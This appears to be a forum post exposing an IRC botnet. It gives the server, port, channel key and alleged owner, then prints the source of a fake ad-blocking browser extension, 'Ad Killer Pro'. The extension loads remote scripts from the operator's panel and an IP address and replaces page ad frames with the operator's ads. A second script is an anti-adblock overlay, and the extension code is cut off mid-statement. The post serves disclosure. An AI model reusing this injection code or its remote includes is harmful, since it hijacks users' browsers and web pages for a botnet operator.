insomnia.incorporatedhosting.info(Insomnia bot hosted in United Kingdom Ovh Systems)

This botnet is found by our anonymous friend here
all credits go to him for this

Server Port
insomnia.incorporatedhosting.info:5656

Channel:
#insomnia k6geyzs

Botnet owner:
Digital from HF and friends

Here Lilyjade extension named Ad Killer Pro (found from our anonymous friend)

//New Lilyjade extension
//Named: Ad Killer Pro
//CrosRider #:4995
//Panel: http://nemsmedia.cloudapp.net

//Extension
appAPI.ready(function($) {
@include "http://nemsmedia.cloudapp.net/Scripts/jquery-1.5.1.min.js"
@include "http://nemsmedia.cloudapp.net/GetExtension.js"
@include "http://46.105.227.94/aab.js"

});



//http://nemsmedia.cloudapp.net/GetExtension.js
var htmlsrc = "";
var ROOTSERVER = 'http://nemsmedia.cloudapp.net';
var SRCSCR = '/Extension/GetAds';

function init() { // Load Calls $(document).ready(function() { initWindow(); }); // Check post-load for ready (may need timer later) var s = document.readyState, getLast = function(){ var elms = document.getElementsByTagName('*'); return elms[elms.length - 1]; }; if (s === 'complete'){ initWindow(); } } // Functions     function aURL(fmid) { return ROOTSERVER + SRCSCR + '/' + fmid; } function findFID(w, h, obj) { var fid = 0; try {     if ((w == 300) && (h == 250)) { fid = 1; } else if ((w == 160) && (h == 600)) { fid = 2; } else if ((w == 728) && (h == 90)) { fid = 3; } else if ((w == 336) && (h == 280)) { fid = 4; } else if ((w == 468) && (h == 60)) { fid = 5; } else if ((w == 234) && (h == 60)) { fid = 6; } else if ((w == 120) && (h == 90)) { fid = 7; } else if ((w == 120) && (h == 600)) { fid = 8; } else if ((w == 120) && (h == 240)) { fid = 9; } else if ((w == 250) && (h == 250)) { fid = 10; } else if ((w == 180) && (h == 150)) { fid = 11; } else if ((w == 200) && (h == 200)) { fid = 12; } else if ((w == 125) && (h == 125)) { fid = 13; } else if ((w == 728) && (h == 15)) { fid = 14; } else if ((w == 468) && (h == 15)) { fid = 15; } else if ((w == 180) && (h == 90)) { fid = 16; } else if ((w == 160) && (h == 90)) { fid = 17; } } catch (z) { } finally { return fid; } } function chkAds() { if(document.body.innerHTML == htmlsrc) { return; } htmlsrc = document.body.innerHTML; domid = "fm_sponsor"; /* TODO *    Optimize timers to prevent slow down *     *    Add to: *     Ebay *     Amazon *     Blogger *     Netflix *     Walmart *     Best Buy */     /* ******************* */ /* *** Enumeration *** */ /* ******************* */ // Enumerate iframes $('iframe[ld!="true"]').each( function(i) { try { $(this).attr("ld", "true"); var h = parseInt($(this).attr('height')); var w = parseInt($(this).attr('width')); var fid = 0; fid = findFID(w, h, $(this).attr('id')); // Update iframe if (fid > 0) { $(this).attr('height', h+10).attr('width', w+10).attr('src', aURL(fid)); } } catch (z) { } }); // Enumerate Flash $('object[ld!="true"]').each( function(i) { try { var h = parseInt($(this).attr('height')); var w = parseInt($(this).attr('width')); var fid = 0; fid = findFID(w, h, this); // Update object if (fid > 0) { $(this).replaceWith('



//http://46.105.227.94/aab.js
<style>
    #cf0d {
        position:fixed!important;
        position:absolute;
        top:0;
        top:expression((t=document.documentElement.scrollTop?document.documentElement.scrollTop:document.body.scrollTop)+"px");
        left:0;
        width:100%;
        height:100%;
        background-color:#fff;
        opacity:0.9;
        filter:alpha(opacity=90);
        display:block
    }
    #cf0d p {
        opacity:1;
        filter:none;
        font:bold 16px Verdana, Arial, sans-serif;
        text-align:center;
        margin:20% 0
    }
    #cf0d p a, #cf0d p i {
        font-size:12px
    }
    #cf0d ~ * {
        display:none
    }
</style>
<noscript>
    <i id=cf0d>
        <p>Please enable JavaScript!
            <br>Bitte aktiviere JavaScript!
            <br>S'il vous pla&icirc;t activer JavaScript!
            <br>Por favor,activa el JavaScript!
            <br>
        </p>
    </i>
</noscript>
<script>
    (function (w, u) {
        var d = w.document,
            z = typeof u;

        function cf0d() {
            function c(c, i) {
                var e = d.createElement('i'),
                    b = d.body,
                    s = b.style,
                    l = b.childNodes.length;
                if (typeof i != z) {
                    e.setAttribute('id', i);
                    s.margin = s.padding = 0;
                    s.height = '100%';
                    l = Math.floor(Math.random() * l) + 1
                }
                e.innerHTML = c;
                b.insertBefore(e, b.childNodes[l - 1])
            }
            function g(i, t) {
                return !t ? d.getElementById(i) : d.getElementsByTagName(t)
            };

            function f(v) {
                if (!g('cf0d')) {
                    c('<p>Please disable your ad blocker!<br>Bitte deaktiviere Deinen Werbeblocker!<br>Veuillez d&eacute;sactiver votre bloqueur de publicit&eacute;!<br>Por favor, desactive el bloqueador de anuncios!<br><a href="http://antiblock.org/?d=2.2.2' + '___' + escape(v) + '">antiblock.org</a> <i>v2.2.2</i></p>', 'cf0d')
                }
            };
            (function () {
                var a = ['ad-728x90-top0', 'ad_global_header2', 'adclear', 'adspot-1x4', 'body_728_ad', 'coverADS', 'sb_advert', 'ad', 'ads', 'adsense'],
                    l = a.length,
                    i, s = '',
                    e;
                for (i = 0; i < l; i++) {
                    if (!g(a[i])) {
                        s += '<a id="' + a[i] + '"></a>'
                    }
                }
                c(s);
                l = a.length;
                for (i = 0; i < l; i++) {
                    e = g(a[i]);
                    if (e.offsetParent == null || (w.getComputedStyle ? d.defaultView.getComputedStyle(e, null).getPropertyValue('display') : e.currentStyle.display) == 'none') {
                        return f('#' + a[i])
                    }
                }
            }());
            (function () {
                var t = g(0, 'img'),
                    a = ['/ad_fill.', '/ad_homepage_', '/adpoint.', '/ads/leaderboard.', '/i/ads/ad', '/mint/ads/ad', '_advertisements/', '_btnad_', '_tile_ad_', '/120x600_'],
                    i;
                if (typeof t[0] != z && typeof t[0].src != z) {
                    i = new Image();
                    i.onload = function () {
                        this.onload = z;
                        this.onerror = function () {
                            f(this.src)
                        };
                        this.src = t[0].src + '#' + a.join('')
                    };
                    i.src = t[0].src
                }
            }());
            (function () {
                var o = {
                    'http://pagead2.googlesyndication.com/pagead/show_ads.js': 'google_ad_client',
                    'http://js.adscale.de/getads.js': 'adscale_slot_id',
                    'http://get.mirando.de/mirando.js': 'adPlaceId'
                },
                    S = g(0, 'script'),
                    l = S.length - 1,
                    n, r, i, v, s;
                d.write = null;
                for (i = l; i >= 0; --i) {
                    s = S[i];
                    if (typeof o[s.src] != z) {
                        n = d.createElement('script');
                        n.type = 'text/javascript';
                        n.src = s.src;
                        v = o[s.src];
                        w[v] = u;
                        r = S[0];
                        n.onload = n.onreadystatechange = function () {
                            if (typeof w[v] == z && (!this.readyState || this.readyState === "loaded" || this.readyState === "complete")) {
                                n.onload = n.onreadystatechange = null;
                                r.parentNode.removeChild(n);
                                w[v] = null
                            }
                        };
                        r.parentNode.insertBefore(n, r);
                        setTimeout(function () {
                            if (w[v] !== null) {
                                f(n.src)
                            }
                        }, 2000);
                        break
                    }
                }
            }())
        }
        if (d.addEventListener) {
            w.addEventListener('load', cf0d, false)
        } else {
            w.attachEvent('onload', cf0d)
        }
    })(window);
</script>

Hosting infos:
http://whois.domaintools.com/176.31.208.105